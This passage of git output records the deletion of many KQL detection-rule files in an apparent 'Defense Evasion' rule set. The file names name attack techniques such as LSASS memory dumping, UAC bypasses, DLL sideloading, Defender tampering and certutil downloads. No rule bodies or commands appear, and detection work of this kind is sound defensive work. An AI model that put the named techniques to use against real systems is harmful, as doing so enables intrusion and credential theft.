Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql delete mode 100644 Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql delete mode 100644 Defense Evasion/Potential_Iviewers.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_LSASS_Process_Dump_Via_Procdump.kql delete mode 100644 Defense Evasion/Potential_LethalHTA_Technique_Execution.kql delete mode 100644 Defense Evasion/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Manage-bde.wsf_Abuse_To_Proxy_Execution.kql delete mode 100644 Defense Evasion/Potential_Memory_Dumping_Activity_Via_LiveKD.kql delete mode 100644 Defense Evasion/Potential_Mfdetours.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Mftrace.EXE_Abuse.kql delete mode 100644 Defense Evasion/Potential_Mpclient.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Mpclient.DLL_Sideloading_Via_Defender_Binaries.kql delete mode 100644 Defense Evasion/Potential_MsiExec_Masquerading.kql delete mode 100644 Defense Evasion/Potential_NTLM_Coercion_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Potential_NetWire_RAT_Activity_-_Registry.kql delete mode 100644 Defense Evasion/Potential_Obfuscated_Ordinal_Call_Via_Rundll32.kql delete mode 100644 Defense Evasion/Potential_Password_Spraying_Attempt_Using_Dsacls.EXE.kql delete mode 100644 Defense Evasion/Potential_PendingFileRenameOperations_Tamper.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_Custom_Protocol_Handler.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_Event_Viewer_Events.asp.kql delete mode 100644 Defense Evasion/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Command_Line_Obfuscation.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Downgrade_Attack.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Execution_Policy_Tampering.kql delete mode 100644 Defense 
Evasion/Potential_PowerShell_Execution_Policy_Tampering_-_ProcCreation.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Execution_Via_DLL.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql delete mode 100644 Defense Evasion/Potential_PowerShell_Obfuscation_Via_WCHAR.kql delete mode 100644 Defense Evasion/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Defense Evasion/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete mode 100644 Defense Evasion/Potential_Process_Execution_Proxy_Via_CL_Invocation.ps1.kql delete mode 100644 Defense Evasion/Potential_Process_Injection_Via_Msra.EXE.kql delete mode 100644 Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution.kql delete mode 100644 Defense Evasion/Potential_Provisioning_Registry_Key_Abuse_For_Binary_Proxy_Execution_-_REG.kql delete mode 100644 Defense Evasion/Potential_Provlaunch.EXE_Binary_Proxy_Execution_Abuse.kql delete mode 100644 Defense Evasion/Potential_Qakbot_Registry_Activity.kql delete mode 100644 Defense Evasion/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Defense Evasion/Potential_Rcdll.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql delete mode 100644 Defense Evasion/Potential_Register_App.Vbs_LOLScript_Abuse.kql delete mode 100644 Defense Evasion/Potential_Regsvr32_Commandline_Flag_Anomaly.kql delete mode 100644 Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql delete mode 100644 Defense Evasion/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql delete mode 100644 Defense Evasion/Potential_RoboForm.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Rundll32_Execution_With_DLL_Stored_In_ADS.kql delete mode 100644 Defense Evasion/Potential_Script_Proxy_Execution_Via_CL_Mutexverifiers.ps1.kql delete mode 
100644 Defense Evasion/Potential_ShellDispatch.DLL_Functionality_Abuse.kql delete mode 100644 Defense Evasion/Potential_ShellDispatch.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features.kql delete mode 100644 Defense Evasion/Potential_Signing_Bypass_Via_Windows_Developer_Features_-_Registry.kql delete mode 100644 Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql delete mode 100644 Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql delete mode 100644 Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql delete mode 100644 Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql delete mode 100644 Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_WWlib.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql delete mode 100644 Defense Evasion/Potential_Winnti_Dropper_Activity.kql delete mode 100644 Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql delete mode 100644 Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql delete mode 100644 Defense 
Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql delete mode 100644 Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql delete mode 100644 Defense Evasion/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql delete 
mode 100644 Defense Evasion/PowerShell_Base64_Encoded_WMI_Classes.kql delete mode 100644 Defense Evasion/PowerShell_Console_History_Logs_Deleted.kql delete mode 100644 Defense Evasion/PowerShell_Core_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Defense Evasion/PowerShell_Logging_Disabled_Via_Registry_Key_Tampering.kql delete mode 100644 Defense Evasion/PowerShell_Script_Change_Permission_Via_Set-Acl.kql delete mode 100644 Defense Evasion/PowerShell_Set-Acl_On_Windows_Folder.kql delete mode 100644 Defense Evasion/Powershell_Base64_Encoded_MpPreference_Cmdlet.kql delete mode 100644 Defense Evasion/Powershell_Defender_Disable_Scan_Feature.kql delete mode 100644 Defense Evasion/Powershell_Defender_Exclusion.kql delete mode 100644 Defense Evasion/Powershell_Token_Obfuscation_-_Process_Creation.kql delete mode 100644 Defense Evasion/Powerup_Write_Hijack_DLL.kql delete mode 100644 Defense Evasion/Prefetch_File_Deleted.kql delete mode 100644 Defense Evasion/PrintBrm_ZIP_Creation_of_Extraction.kql delete mode 100644 Defense Evasion/Procdump_Execution.kql delete mode 100644 Defense Evasion/Process_Access_via_TrolleyExpress_Exclusion.kql delete mode 100644 Defense Evasion/Process_Creation_Using_Sysnative_Folder.kql delete mode 100644 Defense Evasion/Process_Memory_Dump_Via_Comsvcs.DLL.kql delete mode 100644 Defense Evasion/Process_Memory_Dump_Via_Dotnet-Dump.kql delete mode 100644 Defense Evasion/Process_Proxy_Execution_Via_Squirrel.EXE.kql delete mode 100644 Defense Evasion/Proxy_Execution_Via_Explorer.exe.kql delete mode 100644 Defense Evasion/Proxy_Execution_Via_Wuauclt.EXE.kql delete mode 100644 Defense Evasion/Publisher_Attachment_File_Dropped_In_Suspicious_Location.kql delete mode 100644 Defense Evasion/Pubprn.vbs_Proxy_Execution.kql delete mode 100644 Defense Evasion/Python_Image_Load_By_Non-Python_Process.kql delete mode 100644 Defense Evasion/RDP_Connection_Allowed_Via_Netsh.EXE.kql delete mode 100644 Defense 
Evasion/RDP_File_Creation_From_Suspicious_Application.kql delete mode 100644 Defense Evasion/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/RDP_Sensitive_Settings_Changed.kql delete mode 100644 Defense Evasion/RDP_Sensitive_Settings_Changed_to_Zero.kql delete mode 100644 Defense Evasion/REGISTER_APP.VBS_Proxy_Execution.kql delete mode 100644 Defense Evasion/Raccine_Uninstall.kql delete mode 100644 Defense Evasion/RedMimicry_Winnti_Playbook_Registry_Manipulation.kql delete mode 100644 Defense Evasion/RegAsm.EXE_Initiating_Network_Connection_To_Public_IP.kql delete mode 100644 Defense Evasion/Reg_Add_Suspicious_Paths.kql delete mode 100644 Defense Evasion/Registry_Explorer_Policy_Modification.kql delete mode 100644 Defense Evasion/Registry_Hide_Function_from_User.kql delete mode 100644 Defense Evasion/Registry_Modification_Via_Regini.EXE.kql delete mode 100644 Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql delete mode 100644 Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql delete mode 100644 Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql delete mode 100644 Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql delete mode 100644 Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql delete mode 100644 Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql delete mode 100644 Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql delete mode 100644 Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql delete mode 100644 Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql delete mode 100644 Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql delete mode 100644 Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql delete mode 100644 Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql delete mode 100644 Defense 
Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql delete mode 100644 Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql delete mode 100644 Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql delete mode 100644 Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_CURL.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_CreateDump_Utility_Execution.kql delete mode 100644 Defense Evasion/Renamed_FTP.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Jusched.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Mavinject.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_MegaSync_Execution.kql delete mode 100644 Defense Evasion/Renamed_Msdt.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_NirCmd.EXE_Execution.kql delete mode 100644 Defense Evasion/Renamed_Office_Binary_Execution.kql delete mode 100644 Defense Evasion/Renamed_PingCastle_Binary_Execution.kql delete mode 100644 Defense Evasion/Renamed_Plink_Execution.kql delete mode 100644 Defense Evasion/Renamed_ProcDump_Execution.kql delete mode 100644 Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Defense Evasion/Renamed_Vmnat.exe_Execution.kql delete mode 100644 Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql delete mode 100644 Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql delete mode 100644 Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql delete mode 100644 Defense Evasion/RunDLL32_Spawning_Explorer.kql delete mode 100644 Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql delete mode 100644 Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql delete mode 100644 Defense Evasion/Run_PowerShell_Script_from_ADS.kql delete mode 100644 Defense 
Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql delete mode 100644 Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql delete mode 100644 Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql delete mode 100644 Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql delete mode 100644 Defense Evasion/Rundll32_Internet_Connection.kql delete mode 100644 Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql delete mode 100644 Defense Evasion/Rundll32_UNC_Path_Execution.kql delete mode 100644 Defense Evasion/SCR_File_Write_Event.kql delete mode 100644 Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql delete mode 100644 Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/ScreenSaver_Registry_Key_Set.kql delete mode 100644 Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql delete mode 100644 Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql delete mode 100644 Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql delete mode 100644 Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql delete mode 100644 Defense Evasion/Service_Binary_in_Suspicious_Folder.kql delete mode 100644 Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql delete mode 100644 Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql delete mode 100644 Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql delete mode 100644 Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql 
delete mode 100644 Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql delete mode 100644 Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql delete mode 100644 Defense Evasion/ShimCache_Flush.kql delete mode 100644 Defense Evasion/Sideloading_Link.EXE.kql delete mode 100644 Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql delete mode 100644 Defense Evasion/Suspect_Svchost_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql delete mode 100644 Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql delete mode 100644 Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Calculator_Usage.kql delete mode 100644 Defense Evasion/Suspicious_Call_by_Ordinal.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql delete mode 100644 Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql delete mode 100644 Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql delete mode 100644 Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql delete mode 100644 Defense Evasion/Suspicious_Creation_with_Colorcpl.kql delete mode 100644 Defense Evasion/Suspicious_Csi.exe_Usage.kql delete mode 100644 Defense Evasion/Suspicious_CustomShellHost_Execution.kql delete mode 100644 Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Double_Extension_Files.kql delete mode 100644 Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql delete mode 100644 Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql 
delete mode 100644 Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_DumpMinitool_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql delete mode 100644 Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql delete mode 100644 Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql delete mode 100644 Defense Evasion/Suspicious_Executable_File_Creation.kql delete mode 100644 Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql delete mode 100644 Defense Evasion/Suspicious_Execution_of_InstallUtil_Without_Log.kql delete mode 100644 Defense Evasion/Suspicious_Extexport_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Extrac32_Alternate_Data_Stream_Execution.kql delete mode 100644 Defense Evasion/Suspicious_File_Created_Via_OneNote_Application.kql delete mode 100644 Defense Evasion/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Defense Evasion/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql delete mode 100644 Defense Evasion/Suspicious_File_Downloaded_From_Direct_IP_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_File_Downloaded_From_File-Sharing_Website_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_File_Encoded_To_Base64_Via_Certutil.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Files_in_Default_GPO_Folder.kql delete mode 100644 Defense Evasion/Suspicious_GUP_Usage.kql delete mode 100644 Defense Evasion/Suspicious_Get-Variable.exe_Creation.kql delete mode 100644 Defense Evasion/Suspicious_HH.EXE_Execution.kql delete mode 100644 Defense Evasion/Suspicious_High_IntegrityLevel_Conhost_Legacy_Option.kql delete mode 100644 Defense Evasion/Suspicious_IIS_URL_GlobalRules_Rewrite_Via_AppCmd.kql delete mode 100644 Defense Evasion/Suspicious_JavaScript_Execution_Via_Mshta.EXE.kql delete mode 100644 
Defense Evasion/Suspicious_LNK_Double_Extension_File_Created.kql delete mode 100644 Defense Evasion/Suspicious_MSDT_Parent_Process.kql delete mode 100644 Defense Evasion/Suspicious_MSHTA_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Microsoft_Office_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql delete mode 100644 Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql delete mode 100644 Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql delete mode 100644 Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql delete mode 100644 Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql delete mode 100644 Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql delete mode 100644 Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql delete mode 100644 Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql delete mode 100644 Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql delete mode 100644 Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql delete mode 100644 Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Defense Evasion/Suspicious_Process_Parents.kql delete mode 100644 Defense Evasion/Suspicious_Process_Start_Locations.kql delete mode 100644 Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_RASdial_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Recursive_Takeown.kql delete mode 100644 Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql delete mode 100644 Defense 
Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql delete mode 100644 Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Activity_Invoking_Sys_File.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Execution_With_Image_Extension.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Invoking_Inline_VBScript.kql delete mode 100644 Defense Evasion/Suspicious_Rundll32_Setupapi.dll_Activity.kql delete mode 100644 Defense Evasion/Suspicious_Runscripthelper.exe.kql delete mode 100644 Defense Evasion/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Defense Evasion/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql delete mode 100644 Defense Evasion/Suspicious_Service_Binary_Directory.kql delete mode 100644 Defense Evasion/Suspicious_Service_Installed.kql delete mode 100644 Defense Evasion/Suspicious_Sigverif_Execution.kql delete mode 100644 Defense Evasion/Suspicious_Splwow64_Without_Params.kql delete mode 100644 Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql delete mode 100644 Defense Evasion/Suspicious_Userinit_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql delete mode 100644 Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql delete mode 100644 Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Service_Tampering.kql delete mode 100644 Defense 
Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql delete mode 100644 Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql delete mode 100644 Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql delete mode 100644 Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql delete mode 100644 Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql delete mode 100644 Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql delete mode 100644 Defense Evasion/Suspicious_ZipExec_Execution.kql delete mode 100644 Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql delete mode 100644 Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql delete mode 100644 Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql delete mode 100644 Defense Evasion/Sysmon_Configuration_Update.kql delete mode 100644 Defense Evasion/Sysmon_Driver_Altitude_Change.kql delete mode 100644 Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql delete mode 100644 Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql delete mode 100644 Defense Evasion/System_File_Execution_Location_Anomaly.kql delete mode 100644 Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql delete mode 100644 Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql delete mode 100644 Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql delete mode 100644 Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql delete mode 100644 Defense Evasion/Tasks_Folder_Evasion.kql delete mode 100644 Defense Evasion/TeamViewer_Log_File_Deleted.kql delete mode 100644 Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql delete mode 100644 Defense Evasion/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql delete mode 100644 Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql delete mode 100644 Defense 
Evasion/Tomcat_WebServer_Logs_Deleted.kql delete mode 100644 Defense Evasion/Trust_Access_Disable_For_VBApplications.kql delete mode 100644 Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql delete mode 100644 Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_DismHost.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_EventVwr.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql delete mode 100644 Defense 
Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql delete mode 100644 Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql delete mode 100644 Defense Evasion/UAC_Bypass_Via_Wsreset.kql delete mode 100644 Defense Evasion/UAC_Bypass_WSReset.kql delete mode 100644 Defense Evasion/UAC_Bypass_With_Fake_DLL.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_Event_Viewer.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql delete mode 100644 Defense Evasion/UAC_Bypass_via_Sdclt.kql delete mode 100644 Defense Evasion/UAC_Disabled.kql delete mode 100644 Defense Evasion/UAC_Notification_Disabled.kql delete mode 100644 Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql delete mode 100644 Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql delete mode 100644 Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql delete mode 100644 Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql delete mode 100644 Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql delete mode 100644 Defense 